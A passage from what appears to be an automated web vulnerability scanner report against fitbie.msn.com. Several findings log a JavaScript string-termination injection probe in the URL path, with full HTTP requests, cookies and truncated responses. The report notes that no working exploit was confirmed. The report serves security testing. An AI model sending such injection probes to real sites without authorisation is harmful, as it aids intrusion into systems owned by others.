...[SNIP]...
<a href="/flag/flag/favorites/defaultb8120';98e70ce71e7?destination=node%2Fdefaultb8120';98e70ce71e7&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.71. http://fitbie.msn.com/sites/default/files/MM_standard_push_A-male-th_1.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/MM_standard_push_A-male-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e92'%3b5fb1b2620c was submitted in the REST URL parameter 2. This input was echoed as 56e92';5fb1b2620c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default56e92'%3b5fb1b2620c/files/MM_standard_push_A-male-th_1.jpg?1287508674 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:30 GMT
Date: Sun, 13 Feb 2011 14:26:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default56e92';5fb1b2620c?destination=node%2Fdefault56e92';5fb1b2620c&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.72. http://fitbie.msn.com/sites/default/files/after-ang-chris-patterson-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/after-ang-chris-patterson-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76313'%3b8665b915b0b was submitted in the REST URL parameter 2. This input was echoed as 76313';8665b915b0b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default76313'%3b8665b915b0b/files/after-ang-chris-patterson-th.jpg?1297112848 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:16 +0000
ETag: "1297607176-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:16 GMT
Date: Sun, 13 Feb 2011 14:26:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default76313';8665b915b0b?destination=node%2Fdefault76313';8665b915b0b&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.73. http://fitbie.msn.com/sites/default/files/after-ang-chris-patterson-th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/after-ang-chris-patterson-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 634a5'%3b4ac34cac64c was submitted in the REST URL parameter 2. This input was echoed as 634a5';4ac34cac64c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default634a5'%3b4ac34cac64c/files/after-ang-chris-patterson-th_0.jpg?1297117181 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:31 GMT
Date: Sun, 13 Feb 2011 14:26:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default634a5';4ac34cac64c?destination=node%2Fdefault634a5';4ac34cac64c&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.74. http://fitbie.msn.com/sites/default/files/after-anthony-henry-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/after-anthony-henry-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 519ab'%3be43b7dad74a was submitted in the REST URL parameter 2. This input was echoed as 519ab';e43b7dad74a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default519ab'%3be43b7dad74a/files/after-anthony-henry-th.jpg?1296858728 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:27 +0000
ETag: "1297607187-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:28 GMT
Date: Sun, 13 Feb 2011 14:26:28 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default519ab';e43b7dad74a?destination=node%2Fdefault519ab';e43b7dad74a&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.75. http://fitbie.msn.com/sites/default/files/after-aracely-todd-petrich-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/after-aracely-todd-petrich-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f110a'%3b9ade2ec551c was submitted in the REST URL parameter 2. This input was echoed as f110a';9ade2ec551c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultf110a'%3b9ade2ec551c/files/after-aracely-todd-petrich-th.jpg?1297115089 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:17 +0000
ETag: "1297607177-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:18 GMT
Date: Sun, 13 Feb 2011 14:26:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf110a';9ade2ec551c?destination=node%2Fdefaultf110a';9ade2ec551c&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.76. http://fitbie.msn.com/sites/default/files/after-ben-janet-hankins-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/after-ben-janet-hankins-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85fad'%3b4eeed3f4789 was submitted in the REST URL parameter 2. This input was echoed as 85fad';4eeed3f4789 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default85fad'%3b4eeed3f4789/files/after-ben-janet-hankins-th.jpg?1297114172 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:25 +0000
ETag: "1297607185-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:26:25 GMT
Date: Sun, 13 Feb 2011 14:26:26 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default85fad';4eeed3f4789?destination=node%2Fdefault85fad';4eeed3f4789&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.77. http://fitbie.msn.com/sites/default/files/after-kris-sumey-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/after-kris-sumey-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73672'%3bfa4b9480dc2 was submitted in the REST URL parameter 2. This input was echoed as 73672';fa4b9480dc2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default73672'%3bfa4b9480dc2/files/after-kris-sumey-th.jpg?1296856223 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:34 +0000
ETag: "1297607194-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:34 GMT
Date: Sun, 13 Feb 2011 14:26:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default73672';fa4b9480dc2?destination=node%2Fdefault73672';fa4b9480dc2&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.78. http://fitbie.msn.com/sites/default/files/after-randy-sumey-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/after-randy-sumey-th.jpg

Issue detail

